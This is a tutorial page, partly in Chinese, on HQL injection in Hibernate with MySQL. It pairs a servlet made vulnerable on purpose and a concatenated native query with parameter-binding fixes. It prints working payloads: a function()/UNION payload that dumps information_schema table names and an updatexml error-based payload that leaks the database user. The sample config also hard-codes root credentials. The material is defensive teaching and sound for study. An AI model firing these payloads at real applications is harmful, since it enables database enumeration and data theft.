// Parameterised native query: the user-supplied schema name is bound as a
// JDBC parameter, so the driver receives it as data and it can never alter
// the statement text. This is the fix for the concatenated form of the same
// query shown further down this page.
String schemaName = req.getParameter("name");
String sql = "SELECT table_name FROM information_schema.tables where table_schema=?";
// NOTE(review): createSQLQuery is deprecated since Hibernate 5.2;
// createNativeQuery is the drop-in replacement.
Query query = session.createSQLQuery(sql);
// Ordinal parameters are 1-based: index 1 is the single '?' above.
query.setParameter(1, schemaName);
<hibernate-configuration>
    <session-factory>
        <!-- Database connection settings.
             NOTE(review): the credentials are hard-coded and the account is
             root. Every query on this page runs with whatever this account may
             do, so an injection reaches every schema on the server. Use a
             least-privilege application user and load the password from the
             environment or a secret store instead of this file. -->
        <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
        <property name="hibernate.connection.url">jdbc:mysql://localhost:3306/testdb</property>
        <property name="hibernate.connection.username">root</property>
        <property name="hibernate.connection.password">password</property>
        <!-- SQL dialect -->
        <property name="hibernate.dialect">org.hibernate.dialect.MySQL8Dialect</property>
        <!-- Echo all executed SQL to stdout. Bound parameters show up as '?',
             but values that string-built HQL (see UserServlet on this page)
             inlines into the query appear verbatim, so the log will contain
             any injected payload. Keep this off outside local debugging. -->
        <property name="hibernate.show_sql">true</property>
        <property name="hibernate.format_sql">true</property>
        <!-- Schema management on startup. "update" alters the existing schema
             to match the mapped entities; it does NOT drop and re-create it
             (that would be "create-drop"). Neither belongs in production,
             where schema changes should be explicit migrations. -->
        <property name="hibernate.hbm2ddl.auto">update</property>
    </session-factory>
</hibernate-configuration>
import javax.persistence.*;

/**
 * JPA entity mapped to the "users" table: an IDENTITY-generated integer id
 * plus a name and an e-mail address stored as plain string columns. A mutable
 * bean with conventional getters/setters, as Hibernate expects.
 */
@Entity
@Table(name = "users")
public class User {

    @Id
    @GeneratedValue(strategy = GenerationType.IDENTITY)
    private int id;

    @Column(name = "name")
    private String name;

    @Column(name = "email")
    private String email;

    /** Primary key; assigned by the database on insert (IDENTITY strategy). */
    public int getId() {
        return this.id;
    }

    public void setId(int id) {
        this.id = id;
    }

    /** Value of the "name" column; the demo servlet on this page looks users up by it. */
    public String getName() {
        return this.name;
    }

    public void setName(String name) {
        this.name = name;
    }

    /** Value of the "email" column. */
    public String getEmail() {
        return this.email;
    }

    public void setEmail(String email) {
        this.email = email;
    }

    /**
     * Debug representation, e.g. {@code User{id=1, name='a', email='b'}}.
     * NOTE(review): this includes the e-mail address, so any log statement
     * that prints a User writes PII to the log.
     */
    @Override
    public String toString() {
        return String.format("User{id=%d, name='%s', email='%s'}", this.id, this.name, this.email);
    }
}
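import org.hibernate.Session;
import org.hibernate.query.Query;

/**
 * Command-line example of the safe way to run an HQL lookup: the e-mail
 * address is bound through a named parameter (":email") instead of being
 * concatenated into the query text, so it reaches JDBC as a value.
 */
public class Main {
    public static void main(String[] args) {
        // Session implements AutoCloseable (Hibernate 5.2+; this page targets
        // 5.6.15), so try-with-resources closes it even when the query throws.
        // The original only closed the session on the success path.
        try (Session session = HibernateUtil.getSessionFactory().openSession()) {
            session.beginTransaction();
            try {
                // HQL query example with named-parameter binding — the safe
                // counterpart of the concatenated "from User where name='" + x + "'"
                // shown in UserServlet on this page.
                Query<User> query = session.createQuery("FROM User WHERE email = :email", User.class);
                query.setParameter("email", "test@example.com");
                User user = query.uniqueResult();
                // uniqueResult() yields null when no row matches; the original
                // dereferenced it unconditionally.
                if (user != null) {
                    System.out.println("User: " + user.getName());
                } else {
                    System.out.println("No user found with email: test@example.com");
                }
                session.getTransaction().commit();
            } catch (RuntimeException e) {
                // Don't leave the transaction dangling on failure; then let the
                // exception propagate as before.
                if (session.getTransaction().isActive()) {
                    session.getTransaction().rollback();
                }
                throw e;
            }
        }
    }
}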
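package com.example;

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import org.hibernate.Session;
import org.hibernate.query.Query;

/**
 * Deliberately vulnerable endpoint for the HQL-injection walkthrough on this
 * page: GET /user?name=... looks a User up by name with HQL assembled by string
 * concatenation. The query construction is the bug being demonstrated; do not
 * copy it into real code — the parameterised form is shown alongside it.
 */
@WebServlet("/user")
public class UserServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        resp.setContentType("text/plain");
        PrintWriter out = resp.getWriter();

        String parameter = req.getParameter("name");
        if (parameter == null || parameter.isEmpty()) {
            out.println("Error: 'name' parameter is required.");
            return;
        }

        Session session = HibernateUtil.getSessionFactory().openSession();
        session.beginTransaction();
        try {
            out.print("Hibernate Version: 5.6.15.Final\n\n");

            // SAFE alternative. The original's commented-out version wrote the
            // placeholder as ":parameter" but bound "name", so it would have
            // failed at runtime; the placeholder and the bound name must match.
            // Query<User> query = session.createQuery("FROM User WHERE name = :name", User.class);
            // query.setParameter("name", parameter);

            // VULNERABLE (intentional for the demo): the raw request value is
            // spliced into the HQL text. A single quote in `name` closes the
            // literal and everything after it is parsed as HQL, which is how
            // the function()/updatexml payloads on this page reach MySQL.
            Query<User> query = session.createQuery("from User where name='" + parameter + "'", User.class);
            User user = query.uniqueResult();
            if (user != null) {
                out.println("com.example.User found: " + user.getName() + ", Email: " + user.getEmail());
            } else {
                out.println("No user found with name: " + parameter);
            }
            session.getTransaction().commit();
        } catch (RuntimeException e) {
            // The original's catch block was commented out, so a failed query
            // left the transaction open. Roll it back, then propagate exactly
            // as before (the container still renders the error page).
            if (session.getTransaction().isActive()) {
                session.getTransaction().rollback();
            }
            throw e;
        } finally {
            session.close();
        }
    }
}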
package com.example;

import javax.persistence.*;

/**
 * Entity for the "users" table queried by the demo servlet on this page.
 * Three columns: an IDENTITY-generated integer primary key, a "name" string
 * and an "email" string. Plain mutable bean so Hibernate can populate it.
 */
@Entity
@Table(name = "users")
public class User {

    @Id
    @GeneratedValue(strategy = GenerationType.IDENTITY)
    private int id;

    @Column(name = "name")
    private String name;

    @Column(name = "email")
    private String email;

    // --- accessors ---------------------------------------------------------

    /** Database-assigned primary key. */
    public int getId() { return id; }

    public void setId(int id) { this.id = id; }

    /** Contents of the "name" column. */
    public String getName() { return name; }

    public void setName(String name) { this.name = name; }

    /** Contents of the "email" column. */
    public String getEmail() { return email; }

    public void setEmail(String email) { this.email = email; }
}
<hibernate-configuration>
    <session-factory>
        <!-- Database connection settings.
             NOTE(review): the credentials are hard-coded and the account is
             root. The injectable servlet on this page runs with this account,
             so an attacker can read any schema on the server. Use a
             least-privilege application user and load the password from the
             environment or a secret store instead of this file. -->
        <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
        <property name="hibernate.connection.url">jdbc:mysql://localhost:3306/test</property>
        <property name="hibernate.connection.username">root</property>
        <property name="hibernate.connection.password">password</property>
        <!-- SQL dialect -->
        <property name="hibernate.dialect">org.hibernate.dialect.MySQL8Dialect</property>
        <!-- Echo all executed SQL to stdout. Bound parameters show up as '?',
             but values that string-built HQL inlines into the query appear
             verbatim, so the log will contain any injected payload. Keep this
             off outside local debugging. -->
        <property name="hibernate.show_sql">true</property>
        <property name="hibernate.format_sql">true</property>
        <!-- Schema management on startup. "update" alters the existing schema
             to match the mapped entities; it does NOT drop and re-create it
             (that would be "create-drop"). Neither belongs in production. -->
        <property name="hibernate.hbm2ddl.auto">update</property>
        <!-- Register the entity class explicitly -->
        <mapping class="com.example.User"/>
    </session-factory>
</hibernate-configuration>
// VULNERABLE: the request parameter is concatenated straight into the native
// SQL text. A value such as  x' UNION SELECT ...  closes the string literal and
// appends attacker-controlled SQL, executed with the application's DB account
// (root, per the hibernate.cfg.xml on this page). The fix is the parameterised
// form of this same query: a '?' placeholder bound with setParameter.
String parameter = req.getParameter("name");
Query query = session.createSQLQuery("SELECT table_name FROM information_schema.tables where table_schema='" + parameter + "'");
?name=test' and function('1=2 union select 1,table_name,table_schema from information_schema.tables#')='
这里注意 Hibernate 会把 function('x') 渲染为 x(),即在注入的 SQL 后面追加一对括号,所以 payload 末尾用 MySQL 的单行注释 # 把这对括号(以及原查询剩余部分)注释掉。
通过 function() 方法,可以读取数据库账号有权限访问的任意表(本例配置使用 root 连接,因此实际上是服务器上的全部表)。
报错注入:
name=test' and FUNCTION('updatexml',1,concat('~',user(),'~'),1)=
HQL注入防御
HQL参数名称绑定
防御 SQL/HQL 注入最好的办法就是参数绑定(预编译语句):用户输入作为参数交给驱动,不参与拼接查询文本。
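// Named-parameter binding: each ":name" placeholder is bound by name, so the
// values travel to JDBC as parameters instead of being spliced into the HQL.
// The original had a typo ("user:customerage") that is not valid HQL — the
// entity path is "user.age". setString/setInteger are deprecated since
// Hibernate 5.2; setParameter covers both.
Query<User> query = session.createQuery("from User user where user.name=:customername and user.age=:age", User.class);
query.setParameter("customername", name);
query.setParameter("age", age);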
HQL参数位置邦定:
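// Positional (ordinal) binding. Hibernate 5.3+ no longer accepts legacy "?"
// placeholders in HQL (it throws a QueryException telling you to use JPA-style
// ordinals), so on the 5.6.15 release named on this page the original "?" with
// 0-based setString(0, ...) fails. Use "?1", "?2" and bind them 1-based.
Query<User> query = session.createQuery("from User user where user.name=?1 and user.age=?2", User.class);
query.setParameter(1, name);
query.setParameter(2, age);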